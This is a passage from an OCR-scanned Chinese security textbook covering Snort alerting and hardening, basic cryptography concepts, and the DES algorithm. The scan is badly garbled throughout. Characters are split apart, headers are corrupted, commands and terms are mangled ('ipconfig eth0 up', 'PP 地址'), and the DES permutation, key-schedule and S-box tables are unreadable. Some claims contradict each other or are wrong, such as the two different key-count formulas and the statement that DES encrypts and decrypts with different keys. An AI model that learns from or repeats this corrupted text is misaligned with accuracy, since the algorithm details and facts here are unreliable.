(2) -A full: 默认 报警 模式 。 

(3) -Aunsock: 把 报警 信息 发 送 到 一 个 UNIX 套 接 字 。 

(4) -Anone: 关闭 报警 机 制 。 

使 用 -s 选项 可 以 使 Snort 把 报警 消息 发 送 到 syslog， 默 认 的 设备 是 LOG_AUTHPRIV 
和 LOG _ ALERT。 可 以 修改 snort.conf 文件 更 改 其 配置 。 

Snort 还 可 以 使 用 SMB 报警 机 制 , 通过 SAMBA 把 报警 消息 发 送 到 Windows 主机 。 为 
了 使 用 这 个 报警 机 制 ， 在 运行 ./configure 脚本 时 ， 必 须 使 用 - -enable-smbalerts 选项 。 


入 和 您 擒 测 


克 乡 作 会 兹 大 理论 与 笑 践 


11.4.5 Snort 的 安全 防护 


如 果 Snort 自身 受到 安全 威胁 ， 则 可 能 收 到 错误 的 报警 ， 甚 至 根本 收 不 到 报警 信息 。 
为 保护 Snort 系统 的 运行 安全 ， 必 须 采 取 一 些 必要 的 安全 防护 措施 。 

1. 加 固 运 行 Snort 系统 的 主机 

关闭 运行 Snort 主机 上 的 不 必要 服务 ， 及 时 安装 操作 系统 安全 补丁 。 配 置 防火 墙 使 其 
拒绝 对 ICMP echo 请 求 做 出 回应 ， 并 阻止 任何 其 他 不 必要 的 网 络 访问 。 

2. 在 隐秘 端口 上 运行 Snort 

所 谓 隐蔽 端口 就 是 指 仅 有 进入 数据 包 而 没有 任何 发 出 数据 包 的 网 络 接口 配置 方法 ， 这 
种 措施 可 以 有 效 保护 运行 Snort 系统 主机 的 安全 性 。 隐 蔽 端口 模式 的 实现 主要 建立 在 对 网 
线 进行 特殊 处 理 的 基础 上 ， 其 方法 是 在 运行 Snort 的 主机 上 ， 将 网 络 接口 的 1 针 和 2 针 短 
路 ，3 针 和 6 针 连 到 对 端 。 

3. 在 不 配置 PP 地 址 的 接口 上 运行 Snort 

在 没有 配置 瑟 地 址 的 接口 上 运行 Snort 也 可 以 避免 该 主机 成 为 直接 攻击 目标 。 例 如 ， 
在 Linux 主机 上 ,可 以 运用 命令 ipconfig eth0 up 来 激活 没有 配置 耳 地 址 的 接口 eth0。 这 种 
方法 的 好 处 是 ，Snort 运行 主机 没有 I 了 P 地 址 ， 将 导致 无 人 可 以 进行 网 络 访问 。 


思考 与 练习 


. 简 述 入 侵 检测 系统 的 基本 原理 。 

. 简 述 异常 检测 的 技术 实现 。 

.上 网 查找 相关 资料 ， 整 理 并 分 析 当 前 主流 入 侵 检测 产品 的 技术 性 能 指标 。 

. 简 述 Snort 是 如 何 检 测 分 布 式 拒绝 服务 攻击 的 ， 并 在 局 域 网 内 进行 实验 验证 。 

. 若 构建 一 个 基于 入 侵 检测 技术 和 防火 墙 技术 的 联动 安全 系统 ， 你 是 如 何 考虑 的 ? 


一 


第 12 章 信息 加 密 与 认证 技术 


本 章 学 习 目 标 : 

。 了 解密 码 系统 的 组 成 ; 

。 了 解 加 密 算 法 的 基本 思想 ; 

。 掌握 对 称 加 密 体制 与 非 对 称 加 密 体制 ; 
。 掌握 DES 和 RSA 加 密 技 术 。 


计算 机 密码 学 是 研究 计算 机 信息 加 密 、 解 密 及 其 变换 的 科学 ， 是 数学 和 计算 机 的 交叉 
学 科 ， 也 是 一 门 新 兴 的 学 科 。 随 着 计算 机 网 络 和 计算 机 通信 技术 的 发 展 ， 计 算 机 密码 学 得 
到 前 所 未 有 的 重视 并 迅速 普及 和 发 展 起 来 。 目 前 ， 它 已 成 为 计算 机 安全 主要 的 研究 方向 。 
计算 机 密码 学 的 发 展 可 以 细 分 为 两 个 阶段 。 第 一 阶段 称 为 传统 的 计算 机 密码 学 阶段 。 此 时 ， 
计算 机 密码 工作 者 继续 沿用 传统 密码 学 的 基本 观念 ， 那 就 是 解密 是 加 密 的 简单 逆 过 程 ， 两 
者 所 用 的 密 钥 是 可 以 简单 地 互相 推导 的 ， 因 此 ， 无 论 加 密 密 钥 还 是 解密 密 钥 都 必须 严格 保 
密 。 这 种 方案 用 于 集中 式 系 统 是 行 之 有 效 的 。 计 算 机 密码 学 的 第 二 个 阶段 包括 两 个 方向 : 
-个 方向 是 公用 密 钥 密码 (RSA), 另 一 个 方向 是 传统 方法 的 计算 机 密码 体制 一 一 数据 加 密 
标准 (DES)。 


12.1 ”密码 学 基本 概念 


密码 学 ， 作 为 数学 的 一 个 分 支 ， 是 研究 信息 系统 安全 保密 的 科学 ， 是 密码 编码 学 和 密 
码 分 析 学 的 统称 。 

密码 编码 学 ， 是 关于 消息 保密 的 技术 和 科学 。 密 码 编码 学 是 密码 体制 的 设计 学 ， 即 怎 
样 编码 ， 采 用 什么 样 的 密码 体制 保证 信息 被 安全 地 加 密 。 从 事 此 行业 的 人 员 被 称 为 密码 编 
码 者 。 

密码 分 析 学 ， 是 与 密码 编码 学 相对 应 的 技术 和 科学 ， 即 研究 如 何 破译 密 文 的 科学 和 技 
术 。 密 码 分 析 学 是 在 未 知 密 钥 的 情况 下 从 密 文 推出 明文 或 密 钥 的 技术 。 密 码 分 析 者 是 从 事 
密码 分 析 的 专业 人 员 。 
12.1.1 现代 密码 系统 的 组 成 

现代 密码 系统 一 般 简 称 为 密码 体制 ) 一般 由 5 个 部 分 组 成 。 

(1) 明文 空间 M: 它 是 全 体 明文 的 集合 ， 记 做 M=[M1，M2，…，Mw]。 明 文 用 M( 消 
息 ) 或 P (明文 ) 表示 ， 它 一 般 是 比特 流 ， 明 文 可 被 传送 或 存储 ， 无 论 哪 种 情况 ，M 都 指 
待 加 密 的 消息 。 


司 经 颁 会 扩大 理 雁 与 笑 路 


(2) 密 文 空间 C: 它 是 全 体 密 文 的 集合 ， 记 为 C=[C1，Cz，…，Cxn]。 明 文 加 密 后 的 形 
式 为 密 文 。 

(3) 密 钥 空间 KK: 它 是 全 体 密 钥 的 集合 。 加 密 和 解密 操作 在 密 钥 的 控制 下 进行 。 密 钥 
空间 K 通常 由 加 密 密 钥 和 解密 密 钥 组 成 ， 即 K= (Ke。，Ka)。 

(4) 加 密 算法 E: 它 是 一 簇 由 M 到 C 的 加 密 变 换 ， 对 于 每 一 个 具体 的 Ke，E 确定 出 
一 个 具体 的 加 密 函 数 ， 把 M 加 密 成 密 文 C， 通 常 记 为 C=E (M，Ke) 或 C=Erk。(M)。 

(5) 解密 算法 D: 它 是 一 簇 由 C 到 M 的 解密 变换 ， 对 于 每 一 个 确定 的 Ka，D 确定 出 
一 个 具体 的 解密 函数 ， 把 密 文 C 恢复 为 M， 通 常 记 为 M=D (C，Ka) 或 M=Drk，(C)。 

一 个 有 意义 的 密码 系统 应 当 满足 : 对 于 每 一 确定 的 密 钥 K= (K。，Ka)， 有 M=D (〈C， 
Ka) =D (E (M，Ke)，Ka)， 或 记 为 M= Dk。 (Drk。(MD))。 一 般 地 ， 密 码 系统 的 模型 可 用 
图 12-1 表示 。 


明文 P 明文 P 


加 密 E 


攻击 者 
加 密 密 钥 K。 解密 密 钥 Ka 


图 12-1 一 般 密 码 系 统 示 意图 


12.1.2 密码 算法 的 安全 性 


根据 被 破译 的 难 易 程度 ， 不 同 的 密码 算法 具有 不 同 的 安全 等 级 。 如 果 破 译 算法 的 代价 
大 于 加 密 数 据 的 价值 ， 那 么 算法 可 能 是 安全 的 ， 如 果 破译 算法 所 需 的 时 间 比 加 密 数 据 的 时 
间 更 长 ， 那 么 算法 可 能 是 安全 的 ， 如 果 用 单 密 钥 加 密 的 数据 量 比 破 译 算法 需要 的 数据 量 少 
得 多 ， 那 么 算法 可 能 是 安全 的 。 

这 里 说 “可 能 ”是 因为 在 密码 分 析 中 总 有 新 的 突破 。 另 一 方面 ， 大 多 数 数据 随 着 时 间 
的 推移 ， 其 价值 会 越 来 越 小 ， 这 点 是 很 重要 的 。 

Lars Knudsen 把 破译 算法 分 为 不 同 的 类 别 ， 按 安全 性 的 递减 顺序 分 为 : 

(1) 全 部 破译 。 密 码 分 析 者 找 出 密 钥 K， 这 样 Dk (C) =M。 

(2) 全 盘 推 导 。 密 码 分 析 者 找到 一 个 代替 算法 A， 在 不 知道 密 钥 K 的 情况 下 ， 等 价 于 
Dg (CY) =Ms 

(3) 实例 推导 : 密码 分 析 者 从 截获 的 密 文中 找 出 明文 。 

(4) 信息 推导 。 密 码 分 析 者 获得 一 些 有 关 密 钥 或 明文 的 信息 。 这 些 信息 可 能 是 密 钥 的 
几 个 比特 、 有 关 明 文 格式 的 信息 等 。 

如 果 不 论 密码 分 析 者 有 多 少 密 文 ， 都 没有 足够 的 信息 恢复 出 明文 ， 那 么 这 个 算法 就 是 
无 条 件 保密 的 ， 事 实 上， 只 有 一 次 一 密 方 案 才 是 不 可 破译 的 。 

密码 学 更 关心 在 计算 上 不 可 破译 的 密码 系统 。 如 果 一 个 算法 用 可 得 到 的 资源 都 不 能 破 
译 ， 这 个 算法 则 被 认为 在 计算 上 是 安全 的 。 

可 以 用 不 同方 式 衡 量 攻击 方法 的 复杂 性 。 

(1) 数据 复杂 性 : 用 做 攻击 所 需 输入 的 数据 量 。 


(2) 处 理 复杂 性 : 完成 攻击 所 需要 的 时 间 。 
(3) 存储 需求 : 进行 攻击 所 需要 的 存储 量 。 
攻击 的 复杂 性 取 这 三 个 因素 的 最 小 化 ， 有 些 攻 击 包括 这 三 种 复杂 性 的 折 中 。 


12.1.3 加密 算法 的 基本 思想 


无 论 是 哪 种 类 型 的 加 密 ， 最 基本 的 加 密 思想 只 有 两 个 : 置换 和 移 位 。 

1. 置换 

按照 规则 改变 内 容 的 排列 顺序 。 置 换 是 用 一 个 特定 的 值 蔡 换 另 一 个 特定 的 值 的 过 程 ， 
置换 需要 通信 双方 事先 知道 置换 的 方法 ， 置 换 比 较 简单 ， 频 繁 使 用 会 找到 规律 。 

2. 移 位 

打 乱 字母 的 排列 顺序 。 移 位 是 把 某 个 字母 以 其 前 或 其 后 几 位 的 某 个 特定 的 字母 替代 ， 
移 位 具有 规律 性 ， 容 易 被 攻破 。 

在 很 多 的 加 密 过 程 中 是 把 两 者 结合 起 来 使 用 的 ， 即 置换 又 移 位 。 在 计算 机 中 ， 如 果 想 
自动 实现 大 量 复杂 数据 的 加 密 和 解密 ， 这 就 依赖 于 好 的 、 可 被 计算 机 识别 的 、 被 验证 为 有 
效 的 加 密 算法 。 


12.2 ”加 密 体制 分 类 


密码 体制 从 原理 上 可 分 为 两 大 类 : 即 单 钥 或 对 称 密码 体制 和 双 钥 或 非 对 称 密码 体制 。 
在 传统 的 对 称 加 密 系 统 中 ， 加 密 用 的 密 钥 与 解密 用 的 密 钥 是 相同 的 ， 密 钥 在 通信 中 需要 严 
格 保密 。 在 非 对 称 加 密 系统 中 ， 加 密 用 的 公 钥 与 解密 用 的 私 钥 是 不 同 的 ， 加 密 用 的 公 钥 可 
以 向 大 家 公开 ， 而 解密 用 的 私 钥 是 需要 保密 的 。 
12.2.1 “对称 加 密 体制 


对 称 加 密 技术 对 信息 的 加 密 与 解密 都 使 用 相同 的 密 钥 ， 因 此 又 称 为 密 钥 密码 技术 。 使 
用 对 称 加 密 方法 ， 加 密 方 与 解密 方 必须 使 用 同一 种 加 密 算法 和 相同 的 密 钥 。 

图 12-2 给 出 了 对 称 加 密 的 原理 示意 图 。 对 称 加 密 体 制 的 基本 元 素 包括 原始 的 明文 、 加 
密 算 法 、 密 钥 、 密 文 。 


图 12-2 ”对 称 加 密 体制 原理 示意 图 


只 要 通信 双方 能 确保 密 钥 在 交换 阶段 未 泄露 ， 那 么 就 可 以 保证 信息 的 机 密 性 与 完整 
性 。 对 称 加 密 技术 存在 着 通信 双方 之 间 确 保密 钥 安全 交换 的 问题 。 同 时 ， 如 果 一 个 用 户 与 


个 站 加 盆 与 以 证 蕉 大 


克 参 颁 会 其 大 再 雁 与 笑 夏 


N 个 其 他 用 户 进行 通信 时 ， 每 个 用 户 对 应 一 把 密 钥 ， 那 么 他 就 需要 维护 N 把 密 钥 。 当 网 络 
中 有 N 个 用 户 之 间 进 行 加 密 通信 时 ， 则 需要 有 NX (N-1) 个 密 铀 ， 才 能 保证 任意 两 方 之 
间 的 通信 。 

在 对 称 加 密 体系 中 加 密 方 和 解密 方 使 用 相同 的 密 钥 , 系统 的 保密 性 主要 取决 于 密 钥 
的 安全 性 。 因 此 ， 密 钥 在 加 密 方 和 解密 方 之 间 的 传递 和 分 发 必须 通过 安全 通道 进行 , 在 
公共 网 络 上 使 用 明文 传递 密 钥 是 不 合适 的 。 如 果 密 钥 没 有 以 安全 方式 传送 , 那么 黑客 就 
很 可 能 非常 容易 地 截获 密 钥 。 如 何 产生 满足 保密 的 密 钥 ， 如 何 安全 、 可 靠 地 传送 密 钥 是 
十 分 复杂 的 问题 。 

对 称 加 密 体制 的 优点 主要 体现 在 其 加 密 、 解 密 处 理 速度 快 、 保 密度 高 等 ， 其 缺点 主要 
体现 在 以 下 方面 。 

(1) 密 钥 是 保密 通信 安全 的 关键 ， 发 信 方 必须 安全 、 妥 善 地 把 密 钥 护送 到 收 信 方 ， 不 
能 泄漏 其 内 容 。 如 何 才 能 把 密 钥 安全 地 送 到 收 信 方 ， 是 单 钥 密码 算法 的 突出 问题 。 单 钥 密 
码 算法 的 密 钥 分 发 过 程 十 分 复杂 ， 所 花 代 价 高 。 

(2) 多 人 通信 时 密 钥 组 合 的 数量 会 出 现 爆炸 性 膨胀 ， 使 密 钥 分 发 更 加 复杂 化 ，n 个 人 
进行 两 两 通信 ， 总 共和 需要 的 密 钥 数 为 n(n-1)/2 个 。 

(3) 通信 双方 必须 统一 密 钥 ， 才 能 发 送 保密 的 信息 。 如 果 发 信者 与 收 信者 素 不 相识 ， 
这 就 无 法 向 对 方 发 送 秘密 信息 了 。 

(4) 除了 密 钥 管理 与 分 发 问题 ， 单 钥 密 码 算法 还 存在 数字 签名 困难 问题 ， 通 信 双 方 拥 
有 同样 的 消息 ， 接 收 方 可 以 伪造 签名 ， 发 送 方 也 可 以 否认 发 送 过 某 消息 。 

数据 加 密 标准 DES (Data Encryption Standard) 是 最 典型 的 对 称 加 密 算 法 , 它 是 由 IBM 
公司 推出 ， 经 过 国际 标准 化 组 织 认 定 的 数据 加 密 的 国际 标准 。DES 算法 是 目前 广泛 采用 的 
对 称 加 密 方式 之 一 , 加 密 和 解密 使 用 同一 种 算法 , 但 是 加 密 和 解密 时 的 密 钥 并 不 相同 。 DES 
算法 采用 了 64 位 密 钥 长 度 ， 其 中 8 位 用 于 奇偶 校 验 ， 用 户 可 以 使 用 其 余 的 56 位 。DES 算 
法 并 不 是 非常 安全 的 ， 入 侵 者 使 用 运算 能 力 足 够 强 的 计算 机 ， 对 密 钥 逐 个 尝试 就 可 以 破译 
密 文 。 但 是 ， 破 译 密码 需要 很 长 时 间 的 ， 只 要 破译 的 时 间 超 过 密 文 的 有 效 期 ， 那 么 加 密 就 
是 有 效 的 。 目 前 , 已 经 有 一 些 比 DES 算法 更 安全 的 对 称 加 密 算法 ， 如 IDEA 算法 、RC2 算 
法 、RC4 算法 等 。 
12.2.2 非 对 称 加 密 体 制 


非 对 称 加 密 技术 对 信息 的 加 密 与 解密 使 用 不 同 的 密 钥 ， 用 来 加 密 的 密 钥 是 可 以 公开 的 
公 钥 ， 用 来 解密 的 密 钥 是 需要 保密 的 私 铀 ， 因 此 又 被 称 为 公 钥 加 密 (public key encryption) 
技术 。 

在 1976 年 ，Diffie 与 Hellman 提出 了 公 钥 加 密 的 思想 ， 加密 用 的 公 钥 与 解密 用 的 私 钥 
不 同 , 公开 加 密 密 钥 不 至 于 危及 解密 密 钥 的 安全 , 图 12-3 给 出 了 非 对 称 加 密 的 原理 示意 图 。 
用 来 加 密 的 公 钥 (public key) 与 解密 的 私 钥 (Private key) 是 数学 相关 的 ， 并 且 加 密 公 钥 
与 解密 私 钥 是 成 对 出 现 的 ， 但 是 不 能 通过 加 密 公 钥 来 计算 出 解密 私 钥 。 

非 对 称 密 钥 密 码 体 制 在 现代 密码 学 中 是 非常 重要 的 。 按 照 一 般 的 理解 ， 加 密 主要 是 解 
决 信息 在 传输 过 程 中 的 保密 性 问题 。 但 是 还 存在 着 另 一 个 问题 ， 那 就 是 如 何 对 信息 发 送 人 
和 接收 入 的 真实 身份 进行 验证 ， 以 防止 用 户 对 所 发 出 信息 和 接收 信息 的 事后 抵赖 ， 并 且 能 
够 保证 数据 完整 性 。 非 对 称 密 钥 密 码 体制 对 这 两 个 方面 都 给 出 了 很 好 的 解决 方式 。 


在 非 对 称 密 钥 密码 体制 中 ， 加 密 的 公 钥 与 解密 的 私 钥 是 不 相同 的 。 公 钥 是 公开 的 ， 谁 
都 可 以 使 用 ， 而 私 钥 只 有 解密 人 自己 知道 。 由 于 采用 了 两 个 密 钥 ， 并 且 从 理论 上 可 以 保证 
要 从 公 钥 和 密 文 中 分 析出 明文 和 解密 的 私 钥 在 计算 上 是 不 可 行 的 。 那 么 以 公 钥 作为 加 密 密 
钥 ， 接 收 方 使 用 私 钥 解密 ， 则 可 实现 多 个 用 户 发 送 的 密 文 ， 只 能 由 一 个 持 有 解密 的 私 钥 的 
用 户 解读 。 相 反 ， 如 果 以 用 户 的 私 钥 作 为 加 密 密 钥 ， 而 以 公 钥 作为 解密 密 钥 ， 则 可 以 实现 
由 一 个 用 户 加 密 的 消息 由 多 个 用 户 解 读 。 这 样 网 络 中 及 个 用 户 之 间 进 行 加 密 通 信 时 ， 不 
再 需要 有 NX (N-1) 个 密 钥 ， 并 可 以 用 于 数字 签名 。 

非 对 称 加 密 技 术 可 以 大 大 简化 密 钥 的 管理 。 网 络 中 的 六 个 用 户 之 间 进 行 通 信 加 密 ， 仅 
仅 需 要 使 用 六 对 密 钥 就 可 以 ， 而 且 ， 用 于 解密 的 私 钥 不 需要 发 往 任何 地 方 ， 公 钥 在 传递 和 
发 布 过 程 中 即使 被 截获 ， 由 于 没有 与 公 钥 相 匹配 的 私 钥 ， 截 获 的 公 钥 对 入 侵 者 也 就 没有 太 
大 的 意义 。 这 正 是 非 对 称 加 密 技 术 与 对 称 密 钥 加 密 技 术 相 比 所 具有 的 优势 。 


公 钥 > 
| 
sy | | 
国 加 密 二 解密 过 程 
明文 对 


图 12-3” 非 对 称 加 密 体制 原理 示意 图 


公 钥 加 密 体制 的 优点 是 可 以 公开 加 密 密 钥 ， 适 应 网 络 的 开放 性 要 求 ， 且 仅 需 保密 解密 
密 钥 ， 所 以 密 钥 管理 问题 比较 简单 ， 主 要 缺点 是 加 密 算法 复杂 , 加 密 与 解密 的 速度 比较 慢 。 
目前 ， 主 要 的 公 钥 算法 包括 : RSA 算法 、DSA 算法 、PKCS 算法 与 PGP 算法 等 。 

RSA 公 钥 体制 是 1978 年 由 Rivest、Shamir 和 Adleman 提出 的 一 个 公 钥 密码 体制 , RSA 
就 是 以 其 发 明 者 的 姓名 的 第 一 个 字母 命名 的 。RSA 体制 被 认为 是 目前 为 止 理论 上 最 为 成 熟 
的 一 种 公 钥 密码 体制 -RSA 体制 多 用 在 数字 签名 、 密 钥 管理 和 认证 等 方面 。1985 年 , Elgamal 
构造 了 一 种 基于 离散 对 数 的 公 钥 密码 ,这 就 是 Elgamal 公 钥 体制 。 Elgamal 公 钥 体制 的 密 文 
不 仅 依赖 于 待 加 密 的 明文 ， 而 且 依 赖 于 用 户 选择 的 随机 数 ， 由 于 每 一 次 随机 数 是 不 同 的 ， 
因此 即使 加 密 相同 的 明文 ， 得 到 的 密 文 也 是 不 同 的 。 由 于 这 种 加 密 算法 的 不 确定 性 ， 又 称 
其 为 概率 加 密 体制 。 目 前 ， 典 型 的 公 钥 加 密 算法 还 有 Diffie-Hellman 密 钥 交换 、 数 据 签名 
标准 DSS、 椭 圆 曲 线 密码 等 。 


12.3 DES 对 称 加 密 技术 


DES 算法 于 1977 年 得 到 美国 政府 的 正式 许可 ， 是 一 种 用 56 位 密 钥 来 加 密 64 位 数据 
的 方法 。 
12.3.1 DES 算法 的 历史 


美国 国家 标准 局 1973 年 开始 研究 除 国防 部 外 的 其 他 部 门 的 计算 机 系统 的 数据 加 密 标 
准 , 于 1973 年 5 月 15 日 和 1974 年 8 月 27 日 先后 两 次 向 公众 发 出 了 征求 加 密 算 法 的 公告 。 


信息 加 盆 与 以 证 蕉 大 


克 乡 委 会 花 大 理论 与 笑 践 


加 密 算法 要 达到 的 目的 有 4 点 : 

(1) 提供 高 质量 的 数据 保护 ， 防 止 数据 未 经 授权 的 泄漏 和 未 被 察觉 的 修改 ; 

(2) 具有 相当 高 的 复杂 性 ， 使 得 破译 的 开销 超过 可 能 获得 的 利益 ， 同 时 又 要 便于 理解 
和 掌握 ; 

(3) DES 密码 体制 的 安全 性 应 该 不 依赖 于 算法 的 保密 ， 其 安全 性 仅 以 加 密 密 钥 的 保密 
为 基础 ; 

(4) 实现 经 济 ， 运 行 有 效 ， 并 且 适 用 于 多 种 完全 不 同 的 应 用 。 

1977 年 1 月 ， 美 国政 府 颁布 采纳 IBM 公司 设计 的 方案 作为 非 机 密 数据 的 正式 数据 加 
密 标准 DES。 


12.3.2 DES 算法 的 原理 


DES 算法 的 入 口 参数 有 三 个 : Key、Data 和 Mode。 其 中 Key 为 8 个 字 节 共 64 位 ， 是 
DES 算法 的 工作 密 钥 ，Data 也 为 8 个 字 节 64 位 ， 是 要 被 加 密 或 被 解密 的 数据 ，Mode 为 
DES 的 工作 方式 ， 有 两 种 ， 分 别 为 加 密 或 解密 。 

DES 算法 的 原理 是 : 如 Mode 为 加 密 ， 则 用 Key 去 把 数据 Data 进行 加 密 ， 生 成 Data 
的 密码 形式 (64 位 ) 作为 DES 的 输出 结果 ; 如 Mode 为 解密 ， 则 用 Key 去 把 密码 形式 的 
数据 Data 解密 ， 还 原 为 Data 的 明码 形式 (64 位 ) 作为 DES 的 输出 结果 。 

在 通信 网 络 的 两 端 ， 双 方 约定 一 致 的 Key， 在 通信 的 源 点 用 Key 对 核心 数据 进行 DES 
加 密 ， 然 后 以 密码 的 形式 在 公共 通信 网 中 传输 到 通信 网 络 的 终点 ， 数 据 到 达 目 的 地 后 ， 用 
同样 的 Key 对 密码 数据 进行 解密 ， 便 再 现 了 明码 形式 的 核心 数据 。 这 样 ， 就 保证 了 核心 数 
据 在 公共 通信 网 中 传输 的 安全 性 和 可 靠 性 。 通 过 定期 在 通信 网 络 的 源 端 和 目的 端 同时 改 用 
新 Key， 便 能 进一步 提高 数据 的 保密 性 ， 这 是 现在 金融 交易 网 络 的 流行 做 法 。 


12.3.3 DES 算法 的 实现 步骤 
DES 算法 实现 加 密 需 要 三 个 步骤 。DES 加 密 过 程 如 图 12-4 所 示 。 


输入 64 位 明文 
1 
IP 置 换 表 
| | 
Lo Ro 
和 迭代 16 次 
Li=Ri 
Ri=Ln®@flRia, K) (天 1.2.3.…:16) 
1 
IP 逆 置换 表 
1 
输出 64 位 密 文 


图 12-4 DES 加 密 过 程 


第 一 步 : 初始 置换 。 对 给 定 的 64 位 的 明文 x， 首 先 通过 一 个 耳 置换 表 来 重新 排列 x， 
IP 置换 表 如 图 12-5 所 示 ， 从 而 构造 出 64 位 的 xo，xo-IP(x)=LoRo， 其 中 Lo 表示 xo 的 前 32 
位 ，Ro 表 示 xo 的 后 32 位 。 


图 12-5 人 P 置换 表 


其 中 ， 卫 置换 过 程 是 将 输入 64 位 明文 的 第 58 位 换 到 第 一 位 ， 第 50 位 换 到 第 二 位 ， 
依 此 类 推 ， 最 后 一 位 是 原来 的 第 7 位 。 
第 二 步 : 按照 规则 和 迭代 (迭代 16 次 )。 规 则 为 : 
LiFRi! 
Li © flRi, Ki) (L223, 7 10) 
如 果 是 第 一 次 迭代 Di=Ro，Ri= Lo@fRo,K)， 其 中 符号 @ 表示 的 数学 运算 是 异 或 (0 @ 
0=0、0@1=1、1@0=1、1@1=0), f 表 示 一 种 置换 函数 ，K; 是 子 密 钥 。 
1. 子 密 钥 K; 
假设 密 钥 为 K， 长 度 为 64 位 ,但 是 其 中 第 8、16、24、32、40、48、64 用 做 奇偶 校 验 
位 ， 实 际 上 密 钥 长 度 为 56 位 。K 的 下 标 i 的 取 值 范围 是 1 到 16， 用 16 轮 来 构造 。 构 造 过 
程 如 图 12-6 所 示 。 


64 位 密 钥 字符 串 K 
1 
PC1 变 换 
56 位 
28 位 | | 28 位 
名 Do 
1 T 
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T 
Cn D, 
>| PC2 变 换 一 一 = 48 位 K， 
1 
LS; LS， 
人 D:; 
上 PC? 变换 | 一 > 48 位 K， 
了 1 
LSis LSi 
T T 
Ge Dis 
| PC? 变换 “上 一 48 位 Kis 


图 12-6 子 密 钥 生成 


个 委 加 绍 与 以 证 蕉 大 


克 终 委 会 英 大 理论 与 笑 践 


首先 ， 对 于 给 定 的 密 钥 KK， 应 用 PC1 变换 进行 选 位 ， 选 定 后 的 结果 是 56 位 ， 设 其 前 
28 位 为 Co， 后 28 位 为 De。PC1 选 位 如 图 12-7 所 示 。 


看 型 本 本 区 本 加 开罗 宣 可 训 林 晤 


EE 


图 12-7 PC1l 选 位 表 
第 一 轮 : 第 一 列 是 LS1， 第 二 列 是 LS;s， 以 此 类 推 。LSi 是 左 移 的 位 数 。 对 Co 做 左 移 
LS1 得 到 Ci， 对 Do 做 左 移 LS 得 到 Di， 左 移 的 原理 是 所 有 二 进位 循环 左 移 。LS 移 位 表 如 
图 12-8 所 示 。 


|1|>:|3|14|s|jsl7jsl9 llulaolasalalaslacl 
位 数 |1|112121212121211|2 |2 12 |2 |2 1: | 


图 12-8 LS 移 位 表 
然后 对 CiDi 应 用 PC2 进行 选 位 ， 得 到 Ki。PC2 选 位 如 图 12-9 所 示 。 


[alualallslalaslaslslalno 
[2312|214|2|s fi16l7 fall | 


[| ls 37 | lss| 30[40|s |as [ss 14 | 
[4 | [39| sc|34 ss|s6 [4 so ls6 [a 3; | 


图 12-9 PC2 选 位 表 


第 二 轮 : 对 C1，D1 做 左 移 LS; 得 到 Cs 和 D;， 进 一 步 对 C2D; 应 用 PC2 进行 选 位 ， 得 
到 >。 如 此 继续 ， 分 别 得 到 Ks3，K4，…*，Kie。 

2. 函数 了 

函数 /有 两 个 输入 : 32 位 的 Ra 和 48 位 及 ， 丰 函数 的 处 理 流 程 如 图 12-10 所 示 。 


32 位 Ri 


8 位 K; 


48 位 
CC 
32 位 


32 位 输出 
图 12-10 函数 的 处 理 流程 


E 变换 的 算法 是 从 Ri 的 32 位 中 选取 某 些 位 ， 构 成 48 位 。 即 E 将 32 位 扩展 变换 为 
48 位 ， 变 换 规则 根据 EE 位 选择 表 ， 如 图 12-11 所 示 。 


人 个 有 


图 12-11 卫 位 选择 表 
将 王 的 选 位 结果 与 Ki 作 异 或 操作 ， 得 到 一 个 48 位 输出 。 分 成 8 组 ， 每 组 6 位 ， 作 为 


盒 的 输入 。 每 个 S 盒 输出 4 位 ， 共 32 位 ， 


S 盒 的 工作 原理 : S 盒 以 6 位 作为 输入 ， 而 以 4 位 作为 输出 ， 现 在 以 Si 为 例 说 明 其 过 


出 。S 盒 


程 。 假 设 输 入 为 4=aiazasasasa6， 则 azasasas 所 代表 的 数 是 0 到 15 之 间 的 一 个 数 ， 记 为 
有 aazasa4as; 由 aia6 所 代表 的 数 是 0 到 3 间 的 一 个 数 ， 记 为 =arae。 在 Si 的 hh 行列 找到 
个 数 B,，B 在 0 到 15 之 间 ， 它 可 以 用 4 位 二 进 制 数 表 示 ， 为 B=b152b3b4， 这 就 是 Si 的 输 
使 由 8 张 数据 表 组 成 ， 如 图 12-12 所 示 。 
Si 
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图 12-12 S 盒 
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例如 ， 第 二 个 S 盒 的 输入 为 111011, 第 一 位 和 最 后 一 位 组 合 形成 了 11， 它 对 应 着 第 二 
个 盒 的 第 三 行 。 中 间 的 4 位 组 合 在 一 起 形成 了 1101， 它 对 应 着 第 二 个 S 盒 的 第 13 列 。S2 
盒 的 第 三 行 ， 第 13 列 就 是 5 (注意 : 行 、 列 的 记 数 均 从 0 开始 而 不 是 从 1 开始 )， 则 输出 
值 是 0101。 
S 盒 的 输出 作为 P 变换 的 输入 ，P 的 功能 是 对 输入 进行 置换 。 例 如 ， 第 20 位 移 到 第 3 
位 ， 第 25 位移 到 最 后 一 位 。P 换 位 表 如 图 12-13 所 示 。 
[17 p 5 23 | 中 沪 18 | 31 10 | 
法 8|124|114|32|27|3 9 19 | 13 | 30 | 6 22 外 王 川 本 3 


图 12-13 P 换 位 表 


最 后 , 将 了 盒 转换 的 结果 与 最 初 的 Lo 异 或 ,然后 再 进行 下 一 轮 兴 代 。 和 过 代 16 次 以 后 ， 
进入 第 三 步 。 

第 三 步 : 对 DieRi 利用 IP” 做 逆 置 换 ， 就 得 到 了 密 文 y。 逆 置换 IP” 规 则 如 图 12-14 
所 示 。 
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图 12-14 道 署 换 表 IP- 


12.3.4 DES 算法 的 安全 性 


在 DES 作为 加 密 标 准 提出 后 不 入， 学 者 们 就 开始 争论 DES 的 安全 性 。DES 的 一 个 主 
要 缺点 是 DES 的 密 钥 长 度 较 短 ， 这 被 认为 是 DES 仅 有 的 最 严重 的 弱点 ， 针 对 这 个 弱点 的 
攻击 包括 穷 举 测试 密 钥 ， 就 是 利用 一 个 已 知 的 明文 和 密 文 消息 对 进行 穷 举 猜测 ， 直 到 找到 
正确 的 密 钥 。 

然而 ， 不 能 将 强力 密 钥 搜 索 攻 击 看 做 是 一 种 真正 的 攻击 ， 这 是 因为 密码 设计 者 不 仅 已 
经 预见 了 它 ， 而 且 希 望 这 是 对 手 仅 有 的 工具 ， 因 此 ， 假 设 攻击 者 仅 具 有 20 世纪 70 年 代 的 
计算 技术 ， 那 么 DES 是 一 种 十 分 成 功 的 密码 。 

克服 短 密 钥 缺 陷 的 一 个 解决 办 法 是 使 用 不 同 的 密 钥 ， 多 次 运行 DES 算法 ,那样 的 一 个 
